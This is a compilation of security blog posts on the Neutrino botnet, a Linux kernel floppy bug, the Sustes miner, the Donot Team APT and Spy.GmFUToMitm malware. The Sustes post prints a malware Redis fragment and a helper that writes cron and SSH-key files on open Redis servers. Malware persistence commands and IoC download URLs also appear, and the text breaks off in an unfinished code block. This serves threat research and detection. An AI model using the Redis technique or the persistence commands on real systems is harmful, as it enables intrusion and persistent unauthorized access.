Neutrino scans now rank among the top three sources of queries to our honeypots; the leading activities are bruteforcing of admin panels, bruteforcing of shells, and exploitation of vulnerabilities. By scanning for over ten vulnerabilities and competitors' shells, Neutrino has assembled tens of thousands of bots. Most of those are Windows systems running phpStudy, which Neutrino uses to mine Monero. Checks for new exploits are regularly added to its code: the same day an exploit for ThinkPHP (bit.ly/2IKAyhu) was published, we spotted a new version of Neutrino.

But the malware behaves in a careful way. First it finds vulnerable servers and then, after a while, selectively infects them with the images.php shell. It uses a number of ways to hide:


  • Executing code from memory.
  • Checking the shell in several stages before executing code.
  • Placing C2 on infected servers.


We can detect its presence based on specific network requests. At Positive Technologies, we develop detection rules for network attacks. The rules are similar to antivirus signatures, but they check network traffic. We started this article by describing how PT NAD found strange requests based on some tell-tale attributes, specifically bruteforcing of phpMyAdmin and shells. This is how triggered rules are displayed in the PT NAD interface.

Signature triggered during a scan by Neutrino bot
Even though in the example the Neutrino bot was unsuccessful, our rules will detect exploitation of any vulnerability or server infection. We have published some of our rules on GitHub (bit.ly/2IL3R3F).
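By way of illustration, a simplified Suricata-style signature for the shell probe might look like this (illustrative only; not one of the published rules):

```
alert http any any -> $HOME_NET any (msg:"Neutrino bot probing for images.php web shell"; \
    flow:to_server,established; http.method; content:"GET"; http.uri; content:"/images.php"; \
    classtype:trojan-activity; sid:1000001; rev:1;)
```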

To protect servers from Neutrino infection, we recommend that administrators:

  • Check the password for the root account in phpMyAdmin.
  • Patch services and install the latest updates. Remember, Neutrino is regularly updated with new exploits.

Author: Kirill Shipulin, PT ESC

Case study: Searching for a vulnerability pattern in the Linux kernel

This short article describes the investigation of one funny Linux kernel vulnerability and my experience with Semmle QL and Coccinelle, which I used to search for similar bugs.

The kernel bug

Several days ago my custom syzkaller instance got an interesting crash. It had a stable reproducer and I started the investigation. Here I will take the opportunity to say that syzkaller is an awesome project with a great impact on our industry. A tip of my hat to the people working on it!

I found out that the bug causing this crash was introduced to drivers/block/floppy.c in commit 229b53c9bf4e (June 2017).

The compat_getdrvstat() function has the following code:

static int compat_getdrvstat(int drive, bool poll,
                            struct compat_floppy_drive_struct __user *arg)
{
        struct compat_floppy_drive_struct v;

        memset(&v, 0, sizeof(struct compat_floppy_drive_struct));
...
        if (copy_from_user(arg, &v, sizeof(struct compat_floppy_drive_struct)))
                return -EFAULT;
...
}

Here copy_from_user() has the userspace pointer arg as the copy destination and the kernelspace pointer &v as the source. That is obviously a bug. It can be triggered by a user with access to the floppy drive.
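The obvious fix is to use the kernel-to-user copy direction here; a sketch of the corrected call:

```c
/* the corrected call: a kernel-to-user copy must use copy_to_user() */
if (copy_to_user(arg, &v, sizeof(struct compat_floppy_drive_struct)))
        return -EFAULT;
```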

The effect of this bug on x86_64 is funny. It causes memset() of the userspace memory from the kernelspace:

  1. access_ok() for the copy_from_user() source (second parameter) fails. 
  2. copy_from_user() then tries to erase the copy destination (first parameter). 
  3. But the destination is in the userspace instead of kernelspace... 
  4. …so we have a kernel crash: 

[   40.937098] BUG: unable to handle page fault for address: 0000000041414242
[   40.938714] #PF: supervisor write access in kernel mode
[   40.939951] #PF: error_code(0x0002) - not-present page
[   40.941121] PGD 7963f067 P4D 7963f067 PUD 0
[   40.942107] Oops: 0002 [#1] SMP NOPTI
[   40.942968] CPU: 0 PID: 292 Comm: d Not tainted 5.3.0-rc3+ #7
[   40.944288] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   40.946478] RIP: 0010:__memset+0x24/0x30
[   40.947394] Code: 90 90 90 90 90 90 0f 1f 44 00 00 49 89 f9 48 89 d1 83 e2 07 48 c1 e9 03 40 0f b6 f6 48 b8 01 01 01 01 01 01 01 01 48 0f af c6 48 ab 89 d1 f3 aa 4c 89 c8 c3 90 49 89 f9 40 88 f0 48 89 d1 f3
[   40.951721] RSP: 0018:ffffc900003dbd58 EFLAGS: 00010206
[   40.952941] RAX: 0000000000000000 RBX: 0000000000000034 RCX: 0000000000000006
[   40.954592] RDX: 0000000000000004 RSI: 0000000000000000 RDI: 0000000041414242
[   40.956169] RBP: 0000000041414242 R08: ffffffff8200bd80 R09: 0000000041414242
[   40.957753] R10: 0000000000121806 R11: ffff88807da28ab0 R12: ffffc900003dbd7c
[   40.959407] R13: 0000000000000001 R14: 0000000041414242 R15: 0000000041414242
[   40.961062] FS:  00007f91115c4440(0000) GS:ffff88807da00000(0000) knlGS:0000000000000000
[   40.962603] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   40.963695] CR2: 0000000041414242 CR3: 000000007c584000 CR4: 00000000000006f0
[   40.965004] Call Trace:
[   40.965459]  _copy_from_user+0x51/0x60
[   40.966141]  compat_getdrvstat+0x124/0x170
[   40.966781]  fd_compat_ioctl+0x69c/0x6d0
[   40.967423]  ? selinux_file_ioctl+0x16f/0x210
[   40.968117]  compat_blkdev_ioctl+0x21d/0x8f0
[   40.968864]  __x32_compat_sys_ioctl+0x99/0x250
[   40.969659]  do_syscall_64+0x4a/0x110
[   40.970337]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

I haven't found a way to exploit it for privilege escalation.

Kudos to my friends for their advice and jokes—we had a nice time playing with it!

Variant analysis: Semmle QL

My first thought was to search for similar issues throughout the entire kernel source code. I decided to try Semmle QL for that (Semmle has been very active recently). There is a nice introduction to QL and LGTM with enough information for a quick start.

So I opened the Linux kernel project in the Query console and just searched for copy_from_user() calls:

import cpp

from FunctionCall call
where call.getTarget().getName() = "copy_from_user"
select call, "I see a copy_from_user here!"

This query gave only 616 results. That's strange, since the Linux kernel has many more copy_from_user() calls than that. I found the answer in the LGTM documentation:

LGTM extracts information from each codebase and generates a database
ready for querying. For C/C++ projects, the source code is built
as part of the extraction process.

So the kernel config used for the build limits the scope of LGTM analysis. If a kernel subsystem is not enabled in the config, it is not built, and hence we can't analyze its code in LGTM.

The LGTM documentation also says that:
You may need to customize the process to enable LGTM to build the project.
You can do this by adding to your repository an lgtm.yml file for your project.

I decided to create a custom lgtm.yml file for the Linux kernel and asked for a default one on the LGTM community forum.

The answer from the LGTM Team was really fast and helpful:

The worker machines we use on lgtm.com are small and resource-constrained,
so unfortunately make defconfig is just about the biggest config we can use.
It takes 3.5 hours for the full build+extraction+analysis for every commit,
and we allow 4 hours at most.

That's not good, however they are currently working on a solution for big projects.
So I decided to try another tool for my investigation.

Variant analysis: Coccinelle

I had heard about Coccinelle. The Linux kernel community uses this tool a lot. Moreover, I remembered that Kees Cook searched for copy_from_user() mistakes with Coccinelle. So I started to learn the Semantic Patch Language (SmPL) and finally wrote this rule (thanks to Julia Lawall for feedback):

virtual report

@cfu exists@
identifier f;
type t;
identifier v;
position decl_p;
position copy_p;
@@

f(..., t v@decl_p, ...)
{
... when any
copy_from_user@copy_p(v, ...)
... when any
}

@script:python@
f << cfu.f;
t << cfu.t;
v << cfu.v;
decl_p << cfu.decl_p;
copy_p << cfu.copy_p;
@@

if '__user' in t:
  msg0 = "function \"" + f + "\" has arg \"" + v + "\" of type \"" + t + "\""
  coccilib.report.print_report(decl_p[0], msg0)
  msg1 = "copy_from_user uses \"" + v + "\" as the destination. What a shame!\n"
  coccilib.report.print_report(copy_p[0], msg1)

The idea behind it is simple. Usually copy_from_user() is called in functions that take a userspace pointer as a parameter. My rule describes the case when copy_from_user() takes the userspace pointer as the copy destination:

  • The main part of the rule finds all cases when a parameter v of some function f() is used as the first parameter of copy_from_user().
  • In case of a match, the Python script checks whether v has the __user annotation in its type. 

Here is the Coccinelle output:

./drivers/block/floppy.c:3756:49-52: function "compat_getdrvprm" has arg "arg"
of type "struct compat_floppy_drive_params __user *"
./drivers/block/floppy.c:3783:5-19: copy_from_user uses "arg" as the
destination. What a shame!

./drivers/block/floppy.c:3789:49-52: function "compat_getdrvstat" has arg "arg"
of type "struct compat_floppy_drive_struct __user *"
./drivers/block/floppy.c:3819:5-19: copy_from_user uses "arg" as the
destination. What a shame!

So there are two (not very dangerous) kernel vulnerabilities that fit this bug pattern.

Public zero-days

It turned out that I was not the first to find these bugs. Jann Horn reported them in March 2019. He used sparse to find them. I'm absolutely sure that it can find many more error cases than my PoC Coccinelle rule.

But in fact, Jann's patch was lost and it didn't get into the mainline.
So these two bugs could be called "public zero-days" :-)

Anyway, I've reported this issue to LKML, and Jens Axboe will apply Jann's lost patch for Linux kernel v5.4.

Author: Alexander Popov, Positive Technologies

Sustes malware updated to spread via vulnerability in Exim (CVE-2019-10149)

A new wave of attacks by the Sustes cryptominer is infecting computers via a June vulnerability in the Exim mail server. Starting on August 11, our PT Network Attack Discovery network sensors have detected attempts to exploit mail servers in incoming network traffic.



Scanning is performed from address 154.16.67[.]133. The command in the RCPT TO field triggers download of a malicious bash script from http://154.16.67[.]136/main1. A chain of scripts installs the XMR miner on the host and adds it to crontab. One script adds a public SSH key to the authorized_keys list of the current user, after which the attackers can obtain SSH access to the system, no password required.
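CVE-2019-10149 abuses Exim's ${run{...}} string expansion inside the recipient address, so its appearance in an SMTP RCPT TO command is a strong indicator. A minimal detection sketch (the pattern and helper name are our own):

```python
import re

# Flags the ${run{...}} expansion construct inside an SMTP RCPT TO command,
# the hallmark of CVE-2019-10149 exploitation attempts.
SUSPICIOUS_RCPT = re.compile(r'RCPT TO:.*\$\{run\{', re.IGNORECASE)

def looks_like_exim_exploit(smtp_line):
    return bool(SUSPICIOUS_RCPT.search(smtp_line))
```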

In addition, Sustes attempts to spread via SSH to other hosts from the known_hosts list. The connection to them is presumed to occur automatically via public key. Then the process of infection repeats itself on accessible SSH hosts.


Sustes has another method of spreading as well. It runs a chain of Python scripts, the last of which (http://154.16.67[.]135/src/sc) scans random IP addresses for open Redis servers. This script also adds itself to crontab for autorun and places its own key in the list of trusted SSH keys on vulnerable Redis servers:

x = s2.connect_ex((self.host, 6379))

stt2=chkdir(s2, '/etc/cron.d')
rs=rd(s2, 'config set dbfilename crontab\r\n')
rs=rd(s2, 'config set dbfilename authorized_keys\r\n')
stt3=chkdir(s2, '/root/.ssh')
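The fragment above maps onto the well-known technique of abusing an open Redis instance as a file writer: retarget the RDB dump to /etc/cron.d or /root/.ssh and save the database under the name crontab or authorized_keys. A schematic sketch of the command sequence (the helper name and payload framing are our own; a real client would use the RESP protocol to embed the newlines safely):

```python
def redis_file_write_cmds(directory, filename, payload):
    # Redis wraps the dump in binary framing, so the payload is padded
    # with newlines; cron and sshd skip the unparseable surrounding lines.
    return [
        f"CONFIG SET dir {directory}\r\n",
        f"CONFIG SET dbfilename {filename}\r\n",
        f'SET x "\n\n{payload}\n\n"\r\n',
        "SAVE\r\n",
    ]
```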

Getting rid of Sustes isn't difficult: delete the malicious files and scripts listed below, and eliminate malicious entries from crontab and known_hosts. Sustes also exploits other vulnerabilities for infection, such as one in Hadoop YARN ResourceManager, and bruteforces accounts.

IoCs:

Filenames
/etc/cron.hourly/oanacroner1
/etc/cron.hourly/cronlog
/etc/cron.daily/cronlog
/etc/cron.monthly/cronlog
sustse
.ntp
kthrotlds
npt
wc.conf

Urls
http://154.16.67.135/src/ldm
http://154.16.67.135/src/sc
http://107.174.47.156/mr.sh
http://107.174.47.156/2mr.sh
http://107.174.47.156/wc.conf
http://107.174.47.156/11
http://154.16.67.136/mr.sh
http://154.16.67.136/wc.conf

Custom Monero Pools
185.161.70.34:3333
154.16.67.133:80
205.185.122.99:3333

Wallet
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

SSH Public key
AAAAB3NzaC1yc2EAAAADAQABAAAsdBAQC1Sdr0tIILsd8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx AHyvBL8jDZDJ6fuVwEB aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH

MD5
95e2f6dc10f2bc9eecb5e29e70e29a93
235ff76c1cbe4c864809f9db9a9c0c06
e3363762b3ce5a94105cea3df4291ed4
e4acd85686ccebc595af8c3457070993
885beef745b1ba1eba962c8b1556620d
83d502512326554037516626dd8ef972

Script files
Main1 https://pastebin.com/a2rgcgt3
Main1 py snippet https://pastebin.com/Yw2w6J9E
src/sc https://pastebin.com/9UPRKYqy
src/ldm https://pastebin.com/TkjnzPnW

Positive Technologies Brings ‘Hackable City’ to Life in The Standoff Cyberbattle at HITB+ CyberWeek

Attackers and defenders to face off in digital metropolis security challenge featuring real-world critical infrastructure and technologies.


Cybersecurity experts at Positive Technologies and Hack In The Box are inviting red and blue team security specialists to test their skills attacking and defending a full-scale modern city at The Standoff Cyberbattle held during HITB+ CyberWeek. This mock digital metropolis with full IT and OT infrastructure including traffic systems, electrical plants, and transportation networks will feature all the latest technologies used in actual critical infrastructure installations, allowing players to expose security issues and the impact they might have on the real world.

The city will include electrical power plants, freight and passenger carriers, petrochemical facilities, and banks. The infrastructure of each ‘company’ is built using the exact same technologies applied in the respective field, such as ICS/SCADA systems.

Defenders (blue teams) will be tasked with protecting vulnerable services from attackers (red teams).

“We've been working on the Standoff for almost 10 years now. We started with specialized trainings for information security experts and CTF players, but then understood that bringing our expertise even closer to the realities of life is a must to maximize the cyberbattle's practical value. This full-fidelity representation of the arms race between hackers and security specialists is a highlight and audience favorite at PHDays conference, which has been held in Moscow since 2011," said Gregory Galkin, Head of Cyberbattle Business Development at Positive Technologies. "Now, we are bringing this unique format to Hack In The Box, one of the world's best-regarded security conferences.”

Dhillon Kannabhiran, Founder and CEO of Hack In The Box, said: "The Standoff is one of the most challenging attack and defense contests in the world, where teams are competing to find vulnerabilities and attack vectors in real-world critical infrastructure. We've already invited the 2018 and 2019 winners from The Standoff at PHDays to compete in our PRO CTF Finals and we’re excited to now additionally host The Standoff itself at our inaugural HITB+ CyberWeek event in Abu Dhabi."

The Standoff is not a normal Capture the Flag (CTF) game and will require teams to have specific skill sets commonly seen in security professionals. The simulation brings real-world problems to life and will enable industry professionals to hone their protection and monitoring skills.

HITB+ CyberWeek will take place at the Emirates Palace in Abu Dhabi on October 12–17, 2019. The Standoff itself will be held on October 15–17 and members of the media, the public, and those interested in seeing real-world hacking are encouraged to attend. More on the contest can be found at https://cyberweek.ae/competitions/standoff/ and using an official hashtag #HITBCyberWeek on social media.

Studying Donot Team


The APT group Donot Team (aka APT-C-35, SectorE02) has been active since at least 2012. The attackers hunt for confidential information and intellectual property. Their targets include countries in South Asia, in particular the state sector of Pakistan. In 2019, we noticed their activity in Bangladesh, Thailand, India, Sri Lanka, and the Philippines, as well as outside of Asia, in places like Argentina, the United Arab Emirates, and Great Britain.

For several months, we have been monitoring changes in the code of this group's malicious loaders. In this article, we review one of the attack vectors, discuss the loaders in more detail, and touch on the peculiarities of the group's network infrastructure.

Attack chain

At the early stage of infection, the victim receives an MS Word document in Office Open XML format. Even though we do not have direct evidence, we believe the initial penetration vector is a targeted phishing message with an MS Office attachment. The document itself is not malicious, but it abuses the ability to autoload external elements to fetch the next-stage document.

Communicating with a linked external object
The loaded file is an RTF document exploiting vulnerability CVE-2018-0802 in Microsoft Equation Editor. The main shellcode is preceded by a chain of intermediate ones, each decrypting the subsequent stage with a single-byte XOR using keys 0x90 and 0xCE.

First shellcode decrypting the second one
Second shellcode decrypting the third one
Third shellcode decrypting the main one
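The stage decryption is plain single-byte XOR; a sketch (the function name is ours):

```python
def xor1(buf, key):
    # single-byte XOR used between shellcode stages (keys 0x90 and 0xCE);
    # applying it twice with the same key restores the original bytes
    return bytes(b ^ key for b in buf)
```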
The main shellcode performs the following actions:


  • Uses a single-byte XOR with key 0x79 to decrypt binary data from file %TEMP%\one.
  • Creates executable files C:\Windows\Tasks\Serviceflow.exe and C:\Windows\Tasks\sinter.exe. These are the group's malicious loaders. We will talk more about them later.
  • Creates file C:\Windows\Tasks\S_An.dll, containing two bytes 0x90.
  • Creates file C:\Windows\Tasks\A64.dll. Depending on the system bitness, this is a modified x64 or x86 version of the UACMe privilege escalation utility. In addition to bypassing UAC, the library creates and launches BAT script %TEMP%\v.bat. The script uses the following commands to register one of the loaders created earlier as a service:


sc create ServiceTool displayname= "ServiceFill" binpath= "C:\Windows\Tasks\Serviceflow.exe" start= "auto"
sc start ServiceTool

Decrypting BAT scripts in modified UACMe libraries

  • Creates and launches JScript script C:\Windows\Tasks\bin.js. Its task is to launch library A64.dll via RnMod export using rundll32.
  • Creates shortcut WORDICON.lnk in the startup folder. Its task is to launch loader sinter.exe after system restart.
  • Creates shortcut Support.lnk in the startup folder. Its task is to launch bin.js JScript script after system reboot.

Decompiled code of the main shellcode

At this stage, then, two loaders have a firm foothold in the system. We will discuss their operation below.

Lo2 loaders

Although both are classified as Lo2 loaders, the trojans have different objectives. For instance, file Serviceflow.exe acts as a watchdog. It collects the following information about the system:

  • Username
  • Computer name
  • Contents of \Program Files\ and \Program Files (x86)\
  • OS version
  • Data about the processor

The watchdog records the results in file log.txt. It also checks Windows\Tasks\ for files A64.dll and sinter.exe. If necessary, it downloads the files from control server skillsnew[.]top and launches them on behalf of the current user. The corresponding token is extracted from process winlogon.exe.

Trojan sinter.exe lets the attackers know about the infection by sending a request to hxxps://mystrylust.pw/confirm.php, and sends the collected information about the system to skillsnew[.]top. Then, if the attackers are still interested in the victim's computer, the trojan obtains the contents of the customer.txt file at hxxp://docs.google.com/uc?id=1wUaESzjGT2fSuP_hOJMpqidyzqwu15sz&export=download. The file contains the name of control server car[.]drivethrough.top, with which the trojan communicates further. Downloaded files are placed in folder \AppData\Roaming\InStore\ and launched with the task scheduler.

Decrypted strings of command fragments and task template
As a result of the malicious loaders' activity, components of the yty framework are implanted into the system, allowing the attackers to get more details about the victim, including files with certain extensions, intercepted input strings, lists of processes, and screenshots. We will not discuss the plugins in this article.
When we studied other similar samples, we found some paths and project names left in the debugging information, including the following:


  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\New_Single_File\Lo2\SingleV2\Release\BinWork.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\New_Single_File\Lo2\SingleV2_Task_Layout_NewICON\Release\BinWork.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\New_Single_File\Lo2\SingleV2_Task_Layout_NewICON_N_Lnk\Release\BinWork.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\New_Single_File\Lo2\SingleV3\Release\WorkFile.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\Off\Off_New_Api\Release\C++\ConnectLink.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\Off\Off_New_Api\Release\C++\TerBin.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\m0\yty 2.0 - With AES Chunks LOC FOR XP Just Bit-Change_Name\Release\TaskTool.pdb
  • D:\Soft\DevelopedCode_Last\BitDefenderTest\yty 2.0 - With AES Chunks OFFS Just Bit\Release\C++\MsBuild.pdb
  • D:\Soft\DevelopedCode_Last\yty 2.0\Release\C++\Setup.pdb

In addition to substring yty 2.0, which connects the trojans with the framework, we also noticed substring Lo2, which may be an abbreviation of Loader 2.

In loaders versions before mid-2018, all used strings were stored in the file in cleartext. In subsequent builds, the attackers started encrypting the strings. In different versions, the following changes were made to the algorithm:


  • Since May 2018: reverse the string and encode with Base64
  • Since April 2019: perform the previous actions twice.
  • Since January 2019: encrypt the string with AES in CBC mode and encode with Base64. Sample of Python code for decryption:

import base64
from Cryptodome.Cipher import AES

aeskey = (0x23, 0xd4, 0x67, 0xad, 0x96, 0xc3, 0xd1, 0xa5, 0x23, 0x76, 0xae, 0x4e, 0xdd, 0xca, 0x13, 0x55)

def aes_decrypt(data, aeskey):
    iv = bytes(list(range(0, 16)))
    key = bytes(aeskey)
    aes = AES.new(key, AES.MODE_CBC, iv)
    return aes.decrypt(data).decode().strip('\x00')

def base64_aes_decrypt(data, aeskey):
    data = base64.b64decode(data)
    data = aes_decrypt(data, aeskey)
    return data


  • Since June 2019: perform symbol-by-symbol circular subtraction with the set array of bytes, encode with UTF-8, and encode with Base64. Sample of Python code for decryption:

subgamma = (0x2d, 0x55, 0xf, 0x59, 0xf, 0xb, 0x60, 0x33, 0x29, 0x4e, 0x19, 0x3e, 0x57, 0x4d, 0x56, 0xf)

def sub_decrypt(data, subgamma):
    o = ''
    length = len(data)
    subgamma_length = len(subgamma)
    for i in range(length):
        o += chr((0x100 + ord(data[i]) - subgamma[i % subgamma_length]) & 0xff)
    return o

def base64_utf8_sub_decrypt(data, subgamma):
    data = base64.b64decode(data)
    data = data.decode('utf-8')
    data = sub_decrypt(data, subgamma)
    return data


  • Since October 2019: perform symbol-by-symbol circular modified XOR with the set array of bytes, and encode with Base64 twice. The peculiarity of XOR algorithm is that if the string symbol value matches the value of the symbol in the set array of bytes, XOR is not required. Sample of Python code for decryption:

xorgamma = (0x56, 0x2d, 0x61, 0x21, 0x16)

def modxor_decrypt(data, xorgamma):
    o = ''
    length = len(data)
    xorgamma_length = len(xorgamma)
    for i in range(length):
        c = data[i]
        if c != xorgamma[i % xorgamma_length]:
            c = data[i] ^ xorgamma[i % xorgamma_length]
        o += chr(c)
    return o

def base64_modxor_decrypt(data, xorgamma):
    data = base64.b64decode(data)
    data = modxor_decrypt(data, xorgamma)
    return data
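The earliest scheme (reverse plus Base64, and the same pair of steps applied twice from April 2019) has no snippet above; a sketch for completeness (the function name is ours):

```python
import base64

def base64_reverse_decrypt(data, rounds=1):
    # Since May 2018: Base64-decode and reverse the string;
    # since April 2019 the same pair of steps is applied twice (rounds=2).
    for _ in range(rounds):
        data = base64.b64decode(data).decode()[::-1]
    return data
```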

When writing the decryption script, we found that some strings could not be decrypted with the sample's own method, yet they decrypted correctly with one of the methods described above. Having verified that each sample uses only one decryption method, we concluded that the attackers had simply forgotten to delete unused strings or to re-encrypt them for the next version of the malware.

Strings in one of the loader samples were encrypted with various methods, but only one is used in the executable file.
Such mistakes always play into researchers' hands: the leftover strings often contained control servers of the attackers that we did not know about before.

Network Infrastructure peculiarities

To complete the picture, we want to point out some typical features which can help you make a connection between the group's attacks in the future.


  • Most of the control servers are rented from DigitalOcean, LLC (ASN 14061), and are located in Amsterdam.
  • The attackers do not use the same servers for different DNS names. They prefer reserving a new allocated host for each new domain name.
  • In most cases, domain owners' registration information is hidden with privacy services. The attackers can use the following services: WhoisGuard, Inc.; Whois Privacy Protection Service, Inc.; Domains By Proxy, LLC; and Whois Privacy Protection Foundation. In some cases the data is accessible, and we can see the common approach to filling the fields.

WHOIS information about domain burningforests[.]com
WHOIS information about domain cloud-storage-service[.]com

  • Most commonly, the attackers use .top, .pw, .space, .live, and .icu TLD.

Conclusion

Donot Team is known to use its own tools at every stage of the attack. On the one hand, the group uses various techniques to make code analysis more difficult; on the other hand, it does not attempt to hide or disguise its actions in the system. Multiple attacks on the same targets can be indicative of particular interest in the chosen range of victims, but can also mean that the tactics and techniques used are not very effective.

Author: Alexey Vishnyakov, Positive Technologies

IOCs

6ce1855cf027d76463bb8d5954fcc7bb — loader in MS Word format
hxxp://plug.msplugin.icu/MicrosoftSecurityScan/DOCSDOC
21b7fc61448af8938c09007871486f58 — dropper in MS Word format
71ab0946b6a72622aef6cdd7907479ec — loader Lo2 in C:\Windows\Tasks\Serviceflow.exe
22f41b6238290913fc4d196b8423724d — loader Lo2 in C:\Windows\Tasks\sinter.exe
330a4678fae2662975e850200081a1b1 — modified x86 version of UACMe
22e7ef7c3c7911b4c08ce82fde76ec72 — modified x64 version of UACMe
skillsnew[.]top
hxxps://mystrylust.pw/confirm.php
hxxp://docs.google.com/uc?id=1wUaESzjGT2fSuP_hOJMpqidyzqwu15sz&export=download
car[.]drivethrough.top
burningforests[.]com
cloud-storage-service[.]com

Malware creators trying to avoid detection. Spy.GmFUToMitm as an example

Image credit Unsplash
Specialists from PT Expert Security Center found an interesting specimen of malware distributed in the Chinese segment of the Internet. Among other things, this malware is used for MITM attacks. Its main peculiarity is that it combines various techniques for evading detection. We analyzed them to demonstrate how malware creators hide malicious activity.

How it all began

Our network traffic analysis system alerted us that a malicious application was regularly requesting an image with extra content appended. The image was downloaded from imgsa.baidu.com, a legitimate image hosting resource. In addition, we found that the picture itself was super cute. So cute that using it to hide a malicious payload was pure evil.

Figure 1. The image used to hide payload delivery 
To get started, we needed to collect initial data and compare samples. Using characteristic data from the network communication and our large database of malicious traffic, we searched for similar samples and found a few. The network traffic showed an obvious pattern: the same actions repeated by the malicious application again and again.

Figure 2. Network traffic with highlighted patterns
We studied the first request. The server responded by returning encrypted configuration (see Figure 3) with addresses of images containing the payload. That data is stored at http://63634[.]top:8081/koded.

Figure 3. Encrypted configuration

Data decryption

The obtained data is decrypted using the DES algorithm in electronic codebook (ECB) mode with the key 0x6a 0x5f 0x6b 0x2a 0x61 0x2d 0x76 0x62 contained in the body of the malware. After decryption, the plaintext consists of strings (see Figure 4), each containing a link to an image. Judging by the identical MD5 hashes, the image is the same in all of them. The attackers probably placed the same data at different addresses to make delivery more robust.

Figure 4. Sample of decrypted loader configuration
Using the obtained data, the malicious loader then downloads the image. It cuts off the first 5120 bytes (the duckling and the puppy) and uses only the payload, which starts at byte 5121.

Figure 5. Payload sample
After decryption, we obtained a new configuration in a format similar to that obtained at stage one. That was another set of links to images. This time, however, all the MD5 hashes were different, and each string had a two-symbol suffix at the end.

Figure 6. Second set of links, and suspicious suffixes

Malware operation algorithm

Now we see actual payload modules. We found that the two symbols at the end of each string are used to select a specific image and, therefore, a specific payload. The string with AD suffix is used first. That choice is preset during malware development. So the loading sequence is preset in the form of two-symbol suffixes.

Figure 7. Selecting the link with AD suffix
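Conceptually, the selection step works like this (a sketch; the config format is simplified and the helper name is ours):

```python
def pick_by_suffix(config_lines, suffix="AD"):
    # Each decrypted line ends with a two-symbol suffix identifying
    # the module; the loader starts with the preset "AD" entry.
    for line in config_lines:
        if line.endswith(suffix):
            return line[:-len(suffix)]
    return None
```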
The downloaded image contains the malicious module. You can tell just by looking at the file size. The data is still masked as an image and is located at the same 5120-byte offset. The loader puts the extra bytes aside, extracts and checks the hash sum, and then decrypts the module named TkRep.dll into a PE file.

Figure 8. Sample of encrypted module in the image body, and its hash sum
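The carving step can be sketched as follows (the 5120-byte offset is from the text; where the expected MD5 comes from is our assumption):

```python
import hashlib

IMG_HEADER_SIZE = 5120  # decoy image bytes preceding the payload

def carve_payload(image_bytes, expected_md5=None):
    # Discard the decoy image, optionally validating the embedded
    # module's hash before it is decrypted into a PE file.
    payload = image_bytes[IMG_HEADER_SIZE:]
    if expected_md5 is not None and hashlib.md5(payload).hexdigest() != expected_md5:
        raise ValueError("payload hash mismatch")
    return payload
```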
This library is loaded into the malicious process, and first of all it checks the environment where the module is running:

Figure 9. Checking virtualization environment
It checks all running processes for processes named devenv.exe, OLLYDBG.EXE, Dbgview.exe, windbg.exe, MSDEV.exe, Delphi32.exe, E.exe, PCHunter32.exe, and PCHunter64.exe, and also checks for antivirus tools.

Figure 10. Checking processes
Then comes the standard debugging check.

Figure 11. Checking process launch in debugging mode
It also checks whether the open named pipes include those listed in the table.


Next, it registers the infected host on the attackers' server by sending encrypted information about the host in an HTTP POST request.

Figure 12. Request for registration on the attackers' server
Note that the server response always contains the same data; moreover, the client only takes the server's response code into account.

How malware covers its activity

In accordance with the payload sequence, we move on to the next module, which has the AR suffix. As before, the client downloads another image concatenated with an encrypted payload, this time from the Baidu Images storage, then decrypts the module and launches it in a new process with a random name. In our opinion, this functionality is meant to make the malicious application look harmless: often the decoy is a client for an online game. This is yet another masking technique.

Figure 13. Online game interface 
After this false maneuver, the malicious process starts gaining a foothold on the infected host, using functionality typical of a rootkit: for instance, loading its own protected driver into the system.

This is how it happens: from the decrypted configuration, it selects the payload with the AE suffix, the TaskReportDLL.dll library. It has the same functions as the TkRep.dll library from the previous stage: sending information about the system and checking for security tools.

Then it downloads the RealWorkDll.dll library. An important function of RealWorkDll.dll is downloading a driver partially protected with VMProtect, together with a PE file that this driver installs in the system.

Figure 14. Path to the driver's database
Next, the PE files used for driver installation are deleted, and this stage is complete.
A search using a string from the driver database led us to a mirror of the rootkit[.]com repository, where we found a sample of the FUTo rootkit with the corresponding name in its path — objfre_wxp_x86.

Let us now take a closer look at the operation of the SDriverBlogx86 driver installed by the RealWorkDll.dll module. At the first stage, the client's registration data is sent to the network. The request is again an HTTP POST, but this time it goes to port 8081. It looks like this port is used to receive data once activity on the infected system reaches the FU rootkit stage.

Figure 15. Request to C2 from the driver installed in the system
Communication with the attackers' server is encrypted. Before encryption, the data contains information about the system. The data field delimiters, representation format, and number of fields are identical across all modules (see Figure 16).

Figure 16. Information on the system to identify the infected host
The mechanism of the driver introduced into the system is identical to that of the initial loader. The difference is that this time the links to the images are requested from the rootkit's port, and the path for storing the configuration changed from /koded to /qqwe, possibly a reference to the qq.com and wechat.com services.

The list of modules received by the process is a list of PE files. In this case, however, instead of a two-letter suffix for payload selection, each string ends with a key in the form of a file name.

Figure 17. Configuration received by the driver that got a foothold in the network

After the image is downloaded, the payload is again located at the 5120-byte offset. The payload structure for the installed driver includes the key from the previous list (used as a file name) and the PE file itself. Unlike at the previous stage, this time the payload is not encrypted.
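Analysts can hunt for such image-payload concatenations with a simple heuristic that does not depend on the fixed 5120-byte offset: anything appended after a JPEG's end-of-image marker is suspect. A minimal sketch (our own detection idea, not the malware's logic):

```python
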